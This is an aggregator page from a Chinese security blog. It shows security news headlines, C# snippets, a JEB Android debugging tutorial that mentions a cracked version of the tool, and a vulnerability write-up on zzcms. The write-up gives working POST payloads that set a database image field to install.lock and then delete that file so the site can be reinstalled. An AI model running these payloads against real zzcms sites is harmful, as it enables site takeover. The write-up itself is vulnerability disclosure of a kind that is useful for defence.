Aggregator

zzcms最新产品版任意文件删除(可导致重装)

8 years 2 months ago

先来看可以导致任意文件删除的地方，在E:/www/zzcms/user/delimg.php中第12行:

$id=$_REQUEST['id']; $sql="select img,img2,img3,flv,editor from zzcms_main where id ='$id'"; $rs=mysql_query($sql); $row=mysql_fetch_array($rs); if ($_REQUEST['action']==1){ if ($row['img']<>"/image/nopic.gif"){ $f="../".substr($row['img'],1); if (file_exists($f)){ unlink($f); }

这里有一个任意文件删除的操作，也就是从zzcms_main中查询出来的img字段值做了一个删除操作。但是这个地方的$id虽然我们不能注入，但是是我们可控的，所以我们找一个入库的地方看看。

在/user/zssave.php中第107行:

if ($_POST["action"]=="add"){ $isok=mysql_query("Insert into zzcms_main(proname,bigclasszm,smallclasszm,shuxing,szm,prouse,gg,pricels,sm,img,img2,img3,flv,province,city,xiancheng,zc,yq,title,keywords,description,sendtime,timefororder,editor,userid,groupid,qq,comane,renzheng,skin) values('$cp_name','$bigclassid','$smallclassid','$shuxing','$szm','$gnzz','$gg','$lsj','$sm','$img1','$img2','$img3','$flv','$province','$city','$xiancheng','$zc','$yq','$title','$keyword','$discription','".date('Y-m-d H:i:s')."','$TimeNum','$username','$userid','$groupid','$qq','$comane','$renzheng','$skin')") ; $cpid=mysql_insert_id(); }elseif ($_POST["action"]=="modify"){ $oldimg1=trim($_POST["oldimg1"]); $oldimg2=trim($_POST["oldimg2"]); $oldimg3=trim($_POST["oldimg3"]); $oldflv=trim($_POST["oldflv"]); $isok=mysql_query("update zzcms_main set proname='$cp_name',bigclasszm='$bigclassid',smallclasszm='$smallclassid',shuxing='$shuxing',szm='$szm',prouse='$gnzz',gg='$gg',pricels='$lsj',sm='$sm',img='$img1',img2='$img2',img3='$img3',flv='$flv',province='$province',city='$city',xiancheng='$xiancheng',zc='$zc',yq='$yq',title='$title',keywords='$keyword',description='$discription',sendtime='".date('Y-m-d H:i:s')."',timefororder='$TimeNum',editor='$username',userid='$userid',groupid='$groupid',qq='$qq',comane='$comane',renzheng='$renzheng',skin='$skin',passed=0 where id='$cpid'");

可以看到对应着action的不同，sql语句也不同，第一个是Insert，第二个update。我们看到在两个sql语句中都有img这个字段。并且相对应的的值$img1也是我们可控的：

$img1=$_POST["img1"];

其次就是对于update语句，我们还能控制update哪一行，因为主键id的值也是我们可控的：

$cpid=$_POST["ypid"];

所以结合上面所说，我们能够控制任意zzcms_main表中任意一行img字段的值，所以说我们能够删除任意文件。

漏洞利用：
首先为了防止zzcms_main表中没有任何数据，所以我们首先进行一个增加数据的操作:
payload:

http://localhost/user/zssave.php POST: action=add&img1=1

然后我们开始更新第一行的img字段的值，payload：

http://localhost/user/zssave.php POST: action=modify&img1=/install/install.lock&ypid=1

然后我们再进行删除操作：

http://localhost/user/delimg.php

POST: action=1&id=1
就能删除掉install.lock文件啦。然后开始重装：

Balis0ng's blog

Comments to New Zealand Institute of International Affairs

Government Communications Security Bureau

8 years 2 months ago

Protecting New Zealand’s digital assets in an interconnected world (29.11.16) by Andrew Hampton, Director GCSB.

jeb2.2.7动态调试apk

Balis0ng

8 years 2 months ago

关于jeb

　　JEB是Android应用静态分析的de facto standard,除去准确的反编译结果、高容错性之外,JEB提供的API也方便了我们编写插件对源文件进行处理,实施反混淆甚至一些更高级的应用分析来方便后续的人工分析.jeb凭借其牛X的保护措施和高昂的售价，使得诸多普通逆向爱好者望而却步。
　　不过最近国内一些论坛爆出了jeb的2.2.7破解版本。据说jeb从2.2开始就支持动态调试了，在没有这个之前，我一直用的androidstudio+smalidea来进行调试的，比较麻烦。试用了一下jeb的动态调试功能表示很不错。

如何动态调试

　　其实很简单，不过其中有几个小细节需要注意，首先打开我们的jeb，将apk拖入jeb，如图：

我们双击一下Bytecode。然后会出来两个窗口，一个是smali代码的窗口，一个是apk的结构，如图：

然后我们双击一个类，就可以调到该类的smali代码，如图，我双击KeyListener这个类：
就会自动跳转，这个时候按一下快捷键q就能反编译成伪代码，如图：
然后我们回到smali代码找个地方按ctrl+B下断点(取消断点也是改快捷方式)，如图：

然后我们开始debug,点击这个按钮：
然后出现选择如图所示，选择设备和进程，带D的就是该apk的进程

注意：此时不要开启ddms，不然会出错的
然后点击attach，不出意外就能成功attach上了。
然后我们触发断点：
像这样，就说明成功触发了：

这个时候我们查看VM/Breakpoints这个窗口，就能看到变量的值了，但是这里有个小问题，可以看到v3这个地方应该是个字符串，但是显示的确实数字:

所以这个时候我们需要自己动手改一下啦，将int改为string，就能够正常显示啦！

可以看到自动显示了我们输入的字符串为balisong

这里比较方便的是，从伪代码也能看到该变量的值。
然后其余的比如F6可以单步步入，从上面菜单可以看到debug的功能。这里就不赘述了。
至于软件的下载方式，大家搜一搜，就能找到的。
好了，就到这里。

Balis0ng's blog

网络安全从业人员的“Black Friday”购物清单

张三丰的疯言疯语

8 years 2 months ago

作为一名网络安全从业人员是不是也该在“黑色星期五”淘点什么呢？

Convenient Mobile Commerce is the Key to Success this Holiday Season

The Akamai Blog

8 years 2 months ago

With the Black Friday, Cyber Monday holiday weekend upon us, retailers in the U.S. and abroad are preparing for another peak period for customer acquisition and commerce revenues. In 2016, the U.S. eCommerce market is the second largest globally and...

Ari Weil

ASP.NET 上传图片

她和她的猫

8 years 2 months ago

前台代码： <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="UploadPic.aspx.cs" Inherits="UploadPicDemo.UploadPic" %> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title>ASP.NET上传图片</title> </head> <body> <form id="form1" runat="server"> <div> <asp:Image ID="imagePic" runat="server" /> <br /> <asp:FileUpload ID="fileUpload" runat="server"

21st Century Bank Heist Strikes Tesco Bank, Could Portend Future Attacks

Security News, Insights and Analysis | McAfee

8 years 2 months ago

Last Tuesday, as Americans were filling out their ballots, about 40,000 U.K. citizens were left wondering what happened to their...

The post 21st Century Bank Heist Strikes Tesco Bank, Could Portend Future Attacks appeared first on McAfee Blog.

McAfee

Q3 2016 DDoS Trends Report: UDP Flood Attacks Make Up 49 Percent of Attacks

Verisign Security Blog

8 years 2 months ago

Verisign just released its Q3 2016 DDoS Trends Report, which provides a unique view into online distributed denial of service (DDoS) attack trends from mitigations enacted on behalf of Verisign DDoS Protection Services and research conducted by Verisign iDefense Security Intelligence Services. User Datagram Protocol (UDP) flood attacks continue to dominate in Q3 2016, making […]

The post Q3 2016 DDoS Trends Report: UDP Flood Attacks Make Up 49 Percent of Attacks appeared first on Verisign Blog.

Verisign

第二十六期取证实战篇- 伪基站取证（问题讨论）

电子数据取证与鉴定

8 years 2 months ago

本篇将就传统伪基站的取证鉴定中一些引起争议的问题进行补充说明。

第二十五期取证实战篇- 伪基站取证

电子数据取证与鉴定

8 years 2 months ago

随着公安打击伪基站的力度不断加大，伪基站技术的也在随之不断发展。本篇将就传统伪基站的取证鉴定步骤进行介绍。

Old Protocols, New Exploits: LDAP Unwittingly Serves DDoS Amplification Attacks

F5 Labs

8 years 2 months ago

A new DDoS attack vector that leverages LDAP for reflection-amplification attacks is seeing increased usage.

Security’s Blind Spot: Application Layer Visibility

F5 Labs

8 years 2 months ago

We’ve all seen after-the-fact security camera footage of a wide variety of crimes splashed across social media and news sites. This visibility is a critical component of any judicial system, as it helps identify who did what and provides crucial, objective evidence of what actually happened.

MS509团队获三星官方致谢

MS509

8 years 3 months ago

近日，三星手机公司发布了2016年11月份的安全公告[1]，对MS509团队发现的一中危漏洞予以致谢。漏洞详

App Store Flooded with Phony Retail Apps to Kick Off Holiday Season

Security News, Insights and Analysis | McAfee

8 years 3 months ago

The holiday season has officially kicked off, which means a number of things for many of us: seasonal cheer, quality...

The post App Store Flooded with Phony Retail Apps to Kick Off Holiday Season appeared first on McAfee Blog.

McAfee

Little Trickbot Growing Up: New Campaign

F5 Labs

8 years 3 months ago

Recently there have been several reports of a financial malware named TrickBot; this malware's code looks similar to Dyre.

DBHelper 类

她和她的猫

8 years 3 months ago

using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Data; using System.Data.SqlClient; namespace GFAMS { class DBHelper { //数据库连接字符串 private static string connStr = "Data Source=.;Initial Catalog=数据库名;Integrated Security=True"; /// <summary> /// 内部数据连接对象 /// </summary> private

Yes, My Name is ||

The Akamai Blog

8 years 3 months ago

Different cultures and nationalities have different naming conventions; I came from a one that led me to face the universe with a personal name "Or". I fact, my name has different meanings in different languages. In English the meaning of "Or" is function word that indicate alternatives and in computer coding languages the name "Or" is being used as Boolean operator that enable us to write conditions in our code.

Or Katz

Planning for the End of 2016: A Leap Second and the End-of-Support for SHA-1 TLS Certificates

The Akamai Blog

8 years 3 months ago

A leap second and the final end of browser support for SHA-1 TLS certificates will happen and can potentially break software systems and applications.

Erik Nygren

C# 捕获屏幕源码

她和她的猫

8 years 3 months ago

捕获当前窗体： string Path = @"E:/Test/"; //文件保存路径 int width = this.Size.Width; //当前窗体宽度 int heigh = this.Size.Height; //当前窗体高度 Bitmap bmp = new Bitmap(width, heigh); //新建一个 Bitmap 位图 string FileName = Path + DateTime.Now.ToString("yyyyMMddHHmmss") + "_" + new Random().Next(999) + ".jpg"; this.DrawToBitmap(bmp, new Rectangle(0, 0,

用 JavaScript 做一些有趣的事情

她和她的猫

8 years 3 months ago

昨天晚上正逛着博客园，突然室友说英雄联盟有个“末日仪式召唤提莫大魔王”，活动要求点击按钮500次，就可以领取末日小兵图标。图一.png 然后就看见室友“

Aggregator

Managed ad